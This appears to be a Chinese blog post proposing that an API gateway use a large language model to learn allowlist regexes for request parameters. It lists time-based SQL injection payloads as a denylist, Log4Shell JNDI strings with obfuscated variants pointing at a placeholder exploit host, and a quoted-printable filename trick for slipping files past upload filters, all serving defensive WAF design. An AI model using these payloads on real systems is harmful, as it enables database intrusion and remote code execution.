大语言模型和API网关
一、大模型能力和WAF配置员
今天试验了百度大模型文心一言,大模型可以通过学习键值对内容,输出较为安全的正则表达式:
下面给出一段更为严谨的文字
allowlist = [
"5f50bbb0-31ec-3117-6681-3478eb7b1918",
"67c3a29f-ff70-20f3-45ef-b80a82edc6ff",
"9b076de0-1a53-38bc-9dc4-bf4675f0d64c",
"c8926b24-7485-f5a6-a97a-5708fd3a4fdc",
"129bf3b3-962e-70c5-1e88-41aef88db2e5",
"ee99dd41-6c77-b14c-c4d7-e2b2be1bf59a",
"796c22f7-a3b4-b3c2-6950-6b6713101f65",
"56f798ad-3f4f-9d05-1b79-ceab4bdf3c25",
"f32619b6-45f3-8186-d5a0-be412c36fee9",
"707d52e2-196c-92d4-cea6-f0c15127dfbe",
"c2ed49d7-8bf7-a0b4-8171-0e0a1aef1005",
"62d36776-bc05-9a84-9659-0ab7bc597d20",
"f9020e2b-4ac0-c4e3-7551-abd64e20da20",
"d5e38166-1d51-3300-a3d8-1c0a72a3cce0",
"1e967c88-7de0-2d41-e5dd-dcab30599b18",
"93b1e18b-73c1-53d3-062c-f67c45e9d5a7",
"f9daa359-2998-bbec-57ae-c45ba49b8f19",
"df7f7d51-eb0a-0c35-7899-3f3c80a872e3",
"6c0e76aa-8887-98d1-c84e-52f9a003813e",
"1e15b7f5-4735-2b42-3278-5838ec5cac39",
"d67d044e-bc8b-2364-28a2-665a1c41e065",
"bbd93d22-7d0d-4943-dac0-73a438bc5edb",
"5e0c1d43-4690-4ae8-e3f3-18fb2cdfbc72",
"4b9a00fb-3341-9125-7db5-d97fa9908ee3",
"0f86ea73-1e52-81af-9fc2-e52237c5f0f4",
"6bdb678a-28e6-b1ec-b21f-546db4dbb117",
"74ed2ff8-f536-cfaf-6543-787e116fdcee",
"1affecd5-8f8c-824c-d7bc-e1f35f32b9d4",
"2b19a060-a692-5cfe-edde-331fee711031",
"834fb517-fc48-1312-9b2c-3c792d0feec0"
]
denylist = [
"sleep(5)#",
"1 or sleep(5)#",
"\" or sleep(5)#",
"' or sleep(5)#",
"\" or sleep(5)=\"",
"' or sleep(5)='",
"1) or sleep(5)#",
"\") or sleep(5)=\"",
"') or sleep(5)='",
"1)) or sleep(5)#",
"\")) or sleep(5)=\"",
"')) or sleep(5)='",
";waitfor delay '0:0:5'--",
");waitfor delay '0:0:5'--",
"';waitfor delay '0:0:5'--",
"\";waitfor delay '0:0:5'--",
"');waitfor delay '0:0:5'--",
"\");waitfor delay '0:0:5'--",
"));waitfor delay '0:0:5'--",
"'));waitfor delay '0:0:5'--",
"\"));waitfor delay '0:0:5'--",
"benchmark(10000000,MD5(1))#",
"1 or benchmark(10000000,MD5(1))#",
"\" or benchmark(10000000,MD5(1))#",
"' or benchmark(10000000,MD5(1))#",
"1) or benchmark(10000000,MD5(1))#",
"\") or benchmark(10000000,MD5(1))#",
"') or benchmark(10000000,MD5(1))#",
"1)) or benchmark(10000000,MD5(1))#",
"\")) or benchmark(10000000,MD5(1))#",
"')) or benchmark(10000000,MD5(1))#",
"pg_sleep(5)--",
"1 or pg_sleep(5)--",
"\" or pg_sleep(5)--",
"' or pg_sleep(5)--",
"1) or pg_sleep(5)--",
"\") or pg_sleep(5)--",
"') or pg_sleep(5)--",
"1)) or pg_sleep(5)--",
"\")) or pg_sleep(5)--",
"')) or pg_sleep(5)--",
"AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe",
"AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--",
"AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#",
"SLEEP(5)#",
"SLEEP(5)--",
"SLEEP(5)=\"",
"SLEEP(5)='",
"or SLEEP(5)",
"or SLEEP(5)#",
"or SLEEP(5)--",
"or SLEEP(5)=\"",
"or SLEEP(5)='",
"waitfor delay '00:00:05'",
"waitfor delay '00:00:05'--",
"waitfor delay '00:00:05'#",
"benchmark(50000000,MD5(1))",
"benchmark(50000000,MD5(1))--",
"benchmark(50000000,MD5(1))#",
"or benchmark(50000000,MD5(1))",
"or benchmark(50000000,MD5(1))--",
"or benchmark(50000000,MD5(1))#",
"pg_SLEEP(5)",
"pg_SLEEP(5)--",
"pg_SLEEP(5)#",
"or pg_SLEEP(5)",
"or pg_SLEEP(5)--",
"or pg_SLEEP(5)#",
"'\\"",
"AnD SLEEP(5)",
"AnD SLEEP(5)--",
"AnD SLEEP(5)#",
"&&SLEEP(5)",
"&&SLEEP(5)--",
"&&SLEEP(5)#",
"' AnD SLEEP(5) ANd '1",
"'&&SLEEP(5)&&'1",
"ORDER BY SLEEP(5)",
"ORDER BY SLEEP(5)--",
"ORDER BY SLEEP(5)#",
"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)",
"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#",
"(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--",
"+benchmark(3200,SHA1(1))+'",
"+ SLEEP(10) + '",
"RANDOMBLOB(500000000/2)",
"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))",
"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))",
"RANDOMBLOB(1000000000/2)",
"AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))",
"OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))",
"SLEEP(1)/*' or SLEEP(1) or '\" or SLEEP(1) or \"*/"
]
要求:
1)请提供一个正则表达式。
2)正则表达式应匹配allowlist的内容。
2)编写的正则表达式不应匹配denylist的内容。
3)最终结果不需要介绍、解释和代码,应该只包括正则表达式。
4)正则表达式应尽可能简短,不要过于复杂
通过正向业务数据和反向攻击代码可以获得一个安全的正则表达式
1)以往的WAF配置员就是针对无校验的键值对,提供正则表达式以白名单的方式进行安全防护,防止外部的恶意输入。
可以参考华为产品:https://support.huawei.com/hedex/hdx.do?docid=EDOC1100103264&id=ZH-CN_TOPIC_0183842598
通过1-2周的生产数据进行学习,一般能形成一套针对业务的请求白名单
2)学习业务数据形成白名单的好处:
2.1)例如log4j的变形代码,业务正常的入参如果与log4j差异较大无法满足业务入参表达式,哪怕waf黑名单策略未更新,攻击者也无法得逞
#log4j基本的攻击代码
${jndi:ldap://XXX.net/exploit}
${jndi:rmi://XXX.net/exploit}
#第1种变形
${jnd${upper:ı}:ldap://XXX.com/exploit}
#第2种变形
${j${:-n}di:ldap://XXX.net/exploit}
2.2)利用QP码绕过WAF进行恶意上传,原始例子: https://mp.weixin.qq.com/s/gY8kSFSZ4D9NELO0uc188g
这种情况更加简单,一般文件都是 XXX.doc XXX.docx XXXX.pdf等,有一天突然冒出一个=?UTF-8?0?=E6=B5=8B=E8=AF=95=2Ejsp?= 肯定无法匹配会被正则拦截
二、落地方案
1)首先网关支持对历史调用进行存储以便提供给大模型进行学习生成正则表达式
2)网关对入参键值对进行白名单过滤,以阻止意料之外的HTTP格式
3)可配置可信入参,其中正则表达式可以利用(1)当中记录的请求键值数据让大模型进行学习,由大模型输出安全的表达式并人工二次验证
4)网关还能对复杂业务场景做入参和出参的集成规则,以处理部分逻辑漏洞
总结:当web应用安全和工控安全一样使用白名单自学习的方法进行防护:
1)软件测试理论中的等价类、边界值成为基础理论
2)渗透测试的各种攻击场景变成了安全需求
3)机器学习的理论变成了工程实践
当各个维度的知识串联在一起,反而深深的感受到知识的匮乏